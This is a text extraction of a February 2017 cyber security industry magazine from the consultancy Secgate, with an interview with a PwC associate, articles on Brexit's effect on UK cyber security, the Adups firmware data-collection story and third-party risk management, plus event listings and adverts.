Secgate Technologies Fast Intelligent Protection At Secgate Technologies we deliver information technology and intelligence solutions that both strengthen and empower our clientsâ&#x20AC;&#x2122; IT security and resilience. Our tools give clients technology capabilities that allow them to analyse, correlate, identify and eliminate threats. We are industry experts and leading technologists who have built a suite of solutions with proven defensive capabilities that tackle IT threat detection, analytics and IT incident response. Our flagship product, Forest Tree, has been successfully deployed in a number of complex and unique environments. Part of the specialist advisory group Secgate, our clients include large enterprises, governments and SMEs.

www.secgate.co.uk/technologies

Rising Star Siming Wei

C Y BER WORLD

Rising Star is a new featured section of Cyber World. With our monthly interviews we introduce our Readers to a promising rising star in the Cyber Security Industry. We want to learn about what motivates these future leaders in the world of cyber, about their background, personal and professional development, specialisations and interests, as well as their goals for the future. And we also ask them to offer some advice for the benefit of the next generation interested in entering careers in this fast-growing industry.

Siming Wei is a Cyber Security Senior Associate at PwC. She joined PwC after completing a master’s degree in Wireless and Optical Communications. Siming has also achieved a first class degree in Electrical Engineering. She is currently studying part-time for a second master’s degree in Information Security at the Royal Holloway University.

Please tell us a bit more about yourself.

doing some research on cyber security, I decided it is a very interesting field that offers a promising career.

I joined the PwC Cyber Security Practice in 2014 after completing a master’s degree in Wireless and Optical Communications. Over the past two and half years, I have really delved into the exciting world of cyber security, working on a variety of projects in areas ranging from information security management to identity access management across a number of industries. What made you choose a career in Cyber Security? Making things happen and making things better always give me a great sense of satisfaction. This was the driving force for me behind choosing a degree in engineering. With the inspiration to encourage more young people and especially girls to study STEM subjects, I became a STEM ambassador at University. This is where I encountered cyber security for the first time. Thanks to the IT-related modules in my degree, I was able to understand more about information technology and started to pay more attention to news concerning information security. Upon my graduation, and being attracted by the PwC brand, I went on the graduate recruitment website and found that they were recruiting graduates for cyber security roles. I always wanted to work in the technology field, so after

What are the greatest positives about working in Cyber Security? Cyber security as an industry is constantly growing and evolving with the rapid advance of new technologies. Therefore, the work is never boring and no two days are the same. Gaining exposure to different problems clients are facing and helping them solve these problems has been a very rewarding experience. Cyber security is becoming much more important to business, and thus it is a great pleasure to take part in shaping the cyber security world to enable business growth. It is exciting to work in a very diverse team of people from different of backgrounds here at PwC. The amazing people I work with help me to learn new things every day. What are the greatest challenges in Cyber Security? Over the past few years, a few high-profile security incidents have caused both individuals and organisations to wake up to the importance of cyber security. We have seen quite a lot of organisations starting to seriously invest in cyber security. However, according to the Global State of Information Security Survey 2016, insider threats are still the top risk to

FEBRUA RY 2 017

organisations. Building the right culture to encourage employees to be secure is the biggest challenge. Organisations must realise that only investing in technologies will not be sufficient to improve the organisational information security posture. People, processes and technologies should all be considered when building and improving their information security capability overall. What are the highlights of your career? Joining PwC has been the biggest change in my life and is definitely a highlight in my career. The great opportunities and enormous support I received from the firm and colleagues have really helped me to learn and develop as a cyber security professional. Another highlight of my career has been working on the Cyber Security Challenge Masterclass 2016, which is the culmination of a national competition programme to identify new cyber security talent and was this year designed and hosted by PwC. It is run by the Cyber Security Challenge UK, a non-profit organisation backed by the government and industry bodies. The event itself has helped to raise awareness in society, and encourage people â&#x20AC;&#x201C; especially young people â&#x20AC;&#x201C; to work in cyber security. It was an amazing experience to project manage this high profile event and to be involved from the beginning to the end in game design, event management, marketing and PR for more than 6 months. Where do you see Cyber Security in 10 years? With the constantly changing landscape of threats, I believe that cyber security in 10 years will be very different from today. The Internet of Things, the Cloud and other new internet-based technologies, while introducing great convenience and productivity to our lives, can introduce new risks to cyber security and privacy. Cyber security practitioners and law enforcement agencies will need to respond to new challenges. With GDPR coming into force in 2018, organisations are required to do more to demonstrate they can safeguard the information they are handling. In 10 years, new regulations and industrial standards 55

C Y BER WORLD

â&#x20AC;&#x153;

Joining PwC has been the biggest change in my life and is definitely a highlight in my career.

FEBRUA RY 2 017

may be created to address cyber security in new technologies such as drones, driverless cars and smart homes. What are your career ambitions? Since cyber security is such a broad topic, it is very difficult to be an expert in all areas. With my experience growing, I would like to become a â&#x20AC;&#x2DC;go toâ&#x20AC;&#x2122; person in a specific field of cyber security to solve some of the important problems in society. As I am still at the early stage of my career, I would like to

build a good understanding of different areas in cyber security before choosing my areas of expertise. With the rapid advances in technology, there will be so many new risks to be mitigated and new assets to be protect in cyber security in 5-20 years. Therefore, I want to keep an open mind and be the best I can when opportunities arise. What would you do if you were not a consultant? I would probably be an electrical engineer in the renewable and green energy sector. I would love to use

C Y BER WORLD

the knowledge and the problem solving skills I acquired through my degree to tackle energy shortage and the pollution that comes with electricity generation. What advice would you give young people hoping to enter a career in the field? My advice for young people is to study what you are really passionate about and interested in. Follow your heart instead of your peers. Whatever you choose to study, the skills you developed are transferable and valued in cyber security. We have a very diverse team

here in PwC and we value the different backgrounds and skills each individual brings to the team. Entering a career in cyber security will open up opportunities in many areas and on a wide range of issues. There are so many areas you can go into such as penetration testing, digital forensics and information security governance. You can explore and specialise in the area you are interested in the most. All you need is to be open minded and ready to learn.

FEBRUA RY 2 017

Siming Wei Cyber Security Senior Associate at PwC 58

Brexit could deal blow to UK’s Cyber Security Chris Luenen

About the Author: Chris Luenen is an experienced international security expert with over 10 years experience working in political foundations, academia and think tanks. He has worked with leaders in financial services institutions, industry and international organisations as well as senior politicians, journalists and academics. The outcome of the recent referendum on the question of Britain’s membership in the European Union has many important implications. These range from the exact modalities of Britain’s future relationship with the EU and other EU-member states, the free movement of labour on the continent, the continued stability of the UK housing market, financial services sector and the overall economy to the question of the very future of Great Britain, and especially Scotland’s role in the Union. While many commentators have rightly pointed out that a very much under-appreciated aspect of Brexit concerns security, the issue of cyber security deserves particular attention in this context. In our increasingly interconnected world, cyber security concerns everyone, from states, large corporations,

SMEs to individuals, and attacks and security breaches are on the rise worldwide. The number and severity of breaches recorded are unprecedented, and the culprits are diverse, including the youthful hacker out of his parent’s basement, criminal gangs, hacktivists, terrorists to state-sponsored hackers. The implications of a possible Brexit with regard to cyber security do not just touch on questions of the UK’s national security, but also on the continued competitiveness of the UK’s booming cyber security industry, one of the few remaining growth markets in a depressed global economy, as well as on the competitiveness and security of non-cyber related industries and services.

C Y BER WORLD

IMPACT OF A BREXIT ON THE UK’S CYBER SECURITY INDUSTRY Cybercrime is best combated in partnership with others and by establishing strong and resilient cooperative mechanisms for doing so, and the EU has done much in recent years to raise the level of, and harmonise, cyber security capabilities, regulations, information sharing and cooperation, and facilitate best practice, across the continent. As Britain’s future relationship with the EU remains uncertain, in the coming months and years it will have to redefine several aspects of a relationship that has previously been taken for granted. This will include a decision on its future relationship with the European Crime Centre (EC3) and Europol as well as with the European Union Agency for Network and Information Security (ENISA) and the newly created European Cyber Security Organisation. Irrespective of the specific details of its continued engagement with any individual EU agency, network

or initiative, a full Brexit will at the very least mean that Britain will no longer have a say in devising any directives and policies the EU develops, and which will be implemented across Europe, and may be left having to play catch up after the fact. A particular uncertainty in this context relates to the adoption of the EU’s General Data Protection Regulation (GDPR) and the Data Protection Act (DPA). While these regulations will come into effect before the UK potentially departs from the EU, there will be no obligation for the UK to uphold these regulations thereafter. Should the UK decide not to uphold these regulations, then it will become much more difficult, and costly, for UK companies to continue to do business in the EU on par with their European partners and competitors, and demonstrate compliance with its regulations and norms. Similarly, it is uncertain whether the UK will adopt the new directive on security of network and information systems (NIS), which was adopted throughout the European Union in August.

FEBRUA RY 2 017

SHORTAGE OF CYBER PROFESSIONALS SET TO BECOME WORSE While an argument could be made that the United Kingdom might currently be ahead of its European partners with regard to its overall cyber security posture and measures, this advantage is set to wane as the UK’s pool of talented cyber security professionals diminishes over time – a very real prospect should the UK decide to end, or restrict in any meaningful way, the free movement of labour between the UK and EU member states. According to Diane Miller of Northrop Grumman, a leading expert on the cyber profession, there is already

an estimated shortage of 1.5 million cyber security professionals over the next five years, and new talent is not easy to come by. If travel restrictions were imposed, it would be significantly less attractive for talent to come and work, and build a career, in the UK. LOSING ACCESS TO EU INVESTMENT Yet another way in which the United Kingdom will find itself affected by a Brexit is through the loss of access to the EU’s substantially increased investments into cyber security in recent years. Leaving the European Union will cut the United Kingdom off from the Union’s funding streams for cyber security initiatives,

C Y BER WORLD

companies, and technologies, including the recently announced, and major, Public Private Partnership (PPP) programme, which is set to raise an expected €1.8bn of investment in cyber security. When combined with the potential drop in the cyber security talent pool that the United Kingdom might experience in the years ahead, the loss of these advantages and funding streams will deal a big blow to the overall health and viability of the cyber security industry in Britain, and is unlikely to be compensated by investments from the UK government and private sectors.

“

FEBRUA RY 2 017

Yet another way in which the United Kingdom will find itself affected by a Brexit is through the loss of access to the EU’s substantially increased investments into cyber security in recent years.

CONCLUSION How vulnerable we have all become to cyber crime should be clear at least since the US National Security Agency’s very own hacker group, the Equation Group, has fallen victim to a substantial security breach, having been hacked and some of their offensive toolkit of exploits and other cyber ‘weapons’ stolen and offered for auction, apparently by a previously unknown group of hackers calling itself the The Shadow Brokers.

itself from the EU and revise, rewrite or create new laws, regulations and new mechanisms for cooperation, remain very much uncertain. When considering the potential implications for both the EU’s and the UK’s national, economic and citizens’ personal security, the competitiveness and growth of its respective cyber security industries and many related issues, there is not much room for error.

The future relationship between Britain and the EU, or even the trajectory for how Britain will seek to extricate

C Y BER WORLD

Chris Luenen Operations Director at Secgate

Leron Zinatullin is an experienced risk consultant, specialising in cyber security strategy, management and delivery. He has led large scale, global, high value security transformation projects with a view to improving cost performance and supporting business strategy. He has extensive knowledge and practical experience in solving information security, privacy and architectural issues across multiple industry sectors.

Order now at Amazon

The Psychology Of Information Security In today’s corporations, information security professionals have a lot on their plate. In the face of constantly evolving cyber threats they must comply with numerous laws and regulations, protect their company’s assets and mitigate risks to the furthest extent possible.

The Psychology of Information Security redresses the balance by considering information security from both viewpoints in order to gain insight into security issues relating to human behaviour, helping security professionals understand how a security culture that puts risk into context promotes compliance.

Security professionals can often be ignorant of the impact that implementing security policies in a vacuum can have on the end users’ core business activities. These end users are, in turn, often unaware of the risk they are exposing the organisation to. They may even feel justified in finding workarounds because they believe that the organisation values productivity over security. The end result is a conflict between the security team and the rest of the business, and increased, rather than reduced, risk. This can be addressed by factoring in an individual’s perspective, knowledge and awareness, and a modern, flexible and adaptable information security approach. The aim of the security practice should be to correct employee misconceptions by understanding their motivations and working with the users rather than against them – after all, people are a company’s best assets. Based on insights gained from academic research as well as interviews with UK-based security professionals from various sectors, The Psychology of Information Security – Resolving conflicts between security compliance and human behaviour explains the importance of careful risk management and how to align a security programme with wider business objectives, providing methods and techniques to engage stakeholders and encourage buy-in.

FEBRUA RY 2 017

Adups Firmware Vacuuming up Android Phone Data Back in November, The New York Times reported that the security research firm Kryptowire discovered that ‘several models’ of Android phones were shipped with firmware installed that vacuumed up text messages, location data, IMEI, contacts, and then send this information to a server in Shanghai every 72 hours, without the owner’s knowledge or consent. The firmware also allows the remote installation and execution of code, again without the owner's knowledge or consent. But there has been no follow up on the story: In particular, the question is whether the firmware is still on new phones being distributed, and on which models exactly? Who is recording this data and why? The software in question is firmware that helps mobile carriers do over-the-air updates. The firmware with the recording features is aimed at the low-end Android market. We know that much. A researcher at Kryptowire discovered by accident that a BLU R1 HD

phone he purchased was connecting to IP addresses at adups.com and other domains. So he conducted further analysis and found out that the phone was transmitting data in JSON format using a REST web service call. He then investigated what data the phone was transmitting. Kryptowire says that Adups claims on its website that they have 700 million active devices in the field and a market share of over 70% in 150 countries. Their phones are integrated with 400 wireless carriers. The phones with the firmware were sold on Amazon and Bestbuy. Adups provides software to two Chinese cell phone manufacturers: ZTE and Huawei. But those stats are only from ‘old’ information and sources. What we do not have is a list of which phones are affected right now. Adups also provides big data services to its customers. Obviously the question poses itself whether this is a

C Y BER WORLD

Chinese government effort to spy on its citizens or just bad planning by the manufacturer. The New York Times quoted Adups as saying that the software was written ‘at the request of an unidentified Chinese manufacturer’ and that the company wanted the data for customer support and to block spam calls and texts. The New York Times wrote: ‘The American authorities say it is not clear whether this represents secretive data mining for advertising purposes or a Chinese government effort to collect intelligence.’ The Adups attorney responded by stating that ‘this is a private company that made a mistake.’ Kryptowire only tested one phone. And Huawei or ZTE have not produced a list of which phones have this version of the firmware installed. BLU is an American company and has already removed the firmware. Google told Adups to remove any feature that uses Google Play Services. But Google does not operate in

China – Google Play is used by Android programmers to do things like integrate with Google Maps and share objects. But it is not required to write an Android app and this firmware is not an Android app, but firmware, meaning software programmed at a level below the OS. So Android would not have access. And Google’s action would have changed nothing. So the obvious conclusion is that there are phones out there still vacuuming up data and sending it to AdUps in Shanghai. How many of these are in the USA or Europe is impossible to know for sure. We have no list. And Kryptowire only tested one phone. Tom Karygiannis, VP of Products, stated: ‘I am pretty sure they are in the Chinese market. There are more devices that I am sure they have it. But we would have to test it in our labs to know.’

FEBRUA RY 2 017

Third Party Assurance: Why bother?

C Y BER WORLD

About the Author: Haydn Brooks is a Manager at Secgate. Haydn specialises in helping companies at C-suite level establish and improve their third party risk management, logical IT security, physical security, security training and awareness and cyber strategy. He has a wealth of experience across the banking, financial and healthcare sectors.

ABSTRACT Companies, large and small, rely heavily on their supply chain to run their business. As the number of third parties with access to company and customer data increases, so does the risk of security breaches that have the ability to damage the reputation and sustainability of the business. Third party assurance services can reduce these risks by developing governance and monitoring processes that ensure third parties are managing your data and their own risk appropriately. With threats constantly evolving, the need for a quality third party assurance service is increasing. INTRODUCTION Third party risk management is expensive. It involves performing security reviews of companies that don’t want to be (and don’t have the time to be) reviewed. To be successful it requires input from your procurement, legal, information security and internal audit teams and in order to add any real business value it has to be integrated into a process that produces a real and tangible business outcome. C-level executives have enough on their plate worrying about risks to their own business, let alone other people’s businesses. So why bother? The reasons are the same reasons that we hear time and time again. Operational, reputational, financial and, if your business sits within the financial sector, compliance risk. In short, a failure of one of your third parties will cost you money, clients and time.

At Secgate we like to visualise each one of these four risks by placing them into two main categories – risks to your company’s confidentiality (the ability to protect your customer’s data and your business's intellectual property) and risks to your company’s availability (the ability of your company to maintain the service it provides to its clients). CONFIDENTIALITY Customers have to hand out a massive amount of personally identifiable information in order to do anything in this day and age. They therefore trust you, the custodian of their data to keep it personal. A data breach at one of your suppliers, whether it be a supplier that handles customer credit card information or purely a marketing agency that handles customer names and phone numbers, will erode the trust your customers have in your business. And this will occur whether or not the breach was malicious or accidental. It will make customers think twice about handing over their personal information to you in the future, and this trust will take time to repair and rebuild. This loss of trust in your business and brand is, in essence, reputational damage. Damaged brands don’t do well. Think 2013 and Target’s data breach. Target’s stock price dropped by approximately 10% in the time after the breach was announced, all because of a third party HVAC (heating, ventilation and air conditioning) supplier that you probably can’t name (I know I can’t). Could your business recover from a hit of that magnitude to its bottom line?

FEBRUA RY 2 017

AVAILABILITY Outsourcing is one of the most popular pastimes of businesses in this day and age. Entire consultancies specialise in helping companies outsource pretty much any function they have, from HR through to payroll and IT. Companies are even outsourcing their C-suite executives. And you trust these companies to be able to maintain the same quality and availability that you would come to expect of an in house service. And why shouldn’t you trust them, that’s the service you are paying for. But what happens when something happens that means these companies can longer operate? This category is wider than information security. What happens when the supplier managing your help desk is hit by a flash flood? But that could never happen, could it? Just remember that an inch of snow can bring London to a standstill. Could your company operate without its payroll function? Could your company operate without an 69

IT help desk, or even worse, without any IT capability at all? It’s at times like these that strong business continuity and IT disaster recovery (BC/ITDR) plans become a lifesaver. But why should your company have to invoke a business continuity plan and absorb the associated cost, isn’t that the job of the company that suffered the incident? Ensuring that your suppliers have a strong, robust and well thought out business continuity and ITDR capability will reduce the chance that your company ever has to invoke its own business continuity plan, preventing operational and financial impacts and mitigating both operational and financial risk. SO THIS IS ABOUT TRUST? No. Third party assurance is not about your company not trusting its suppliers. It’s about collaboration. It’s about the sharing of best practice. It’s about saying that no matter how mature your information security control environment is, let’s help each other to improve it. And it’s this constant improvement that helps create a robust and resilient economy that can benefit everyone.

C Y BER WORLD

FINE, YOU HAVE MY ATTENTION. SO WHAT CAN I DO? Firstly, you need to ensure that your company knows what it is dealing with. Do you have a comprehensive third party inventory? Do you know what third parties you use, the service each one of those third parties provides and the data that they take from you to provide it? Does your CISO team talk to your procurement team to get this information? Does your procurement team even have the information? Secondly, you need to focus your attention on the suppliers that matter most. Rank your suppliers in order of importance from both a confidentiality and an availability perspective. A supplier may be supercritical when looking at them through a confidentiality lens, but bottom of the pile from an availability lens and thus should be reviewed appropriately. Your CISO team cannot do this alone. Your procurement and supplier management teams have to be involved. Thirdly, implement a third party assurance programme. Look at the controls you have in place to mitigate the

risk third parties present to your business. Do your third party contracts contain the required clauses (this will involve speaking to your legal team)? Do you check that third parties maintain their information security control environment? Do you check that your third parties are robust enough to recover from incidents and business continuity issues? Combine the criticality of the third parties with the results from your third party assurance program to measure the risk the third party poses to your business. Make the assumption that a strong third party review means a low risk of an incident occurring at the third party and combine the two into your businesses central risk framework. Finally compare this risk to your risk appetite â&#x20AC;&#x201C; are you happy with the risk posed by the third parties that your company utilises?

FEBRUA RY 2 017

Haydn Brooks Information Security Manager at Secgate

Cyber World Missed an edition? Want to subscribe? Want a hardcopy? Want to contribute? Contact us on cyber@secgate.co.uk

C Y BER WORLD

Upcoming Events RSA CONFERENCE USA hosted in San Francisco US from the 13th to the 17th of February 2017

WORLD CYBER SECURITY CONGRESS 2017 hosted in London, UK from the 7th to the 8th of March 2017

EUROPEAN INFORMATION SECURITY SUMMIT 2017 (TEISS) hosted in London, UK from the 21th to the 22nd of February 2017

CYBER INTELLIGENCE ASIA hosted in Kuala Lumpur, Malaysia from the 14th to the 16th of March 2017

SC CONGRESS LONDON 2017 hosted in London, UK on the 23rd February 2017

CYBERUK 2017 hosted in Liverpool, UK from the 14th to the 16th of March 2017 EUROPEAN SMART GRID CYBER SECURITY hosted in London, UK from the 21st to the 23rd of March 2017

FEBRUA RY 2 017

About Secgate Secgate is a specialist security advisory group. Our consultants are skilled and experienced professionals having trained and worked within the consultancy arms of the Big 4 professional services firms. Our technical capabilities, expert business advice and diverse experience in delivering security and advisory services puts us on par with the very best of the Cyber Security advisory industry. We are uniquely placed in the market â&#x20AC;&#x201C; we are able to provide high quality Cyber Security professional services for more competitive and flexible prices than that associated with working with larger consultancies. www.secgate.co.uk info@secgate.co.uk Berkeley Square House Mayfair London W1 United Kingdom Office: +44 (0) 207 887 6423 Mobile: +44 (0) 747 193 7777 Mobile: +44 (0) 744 925 8888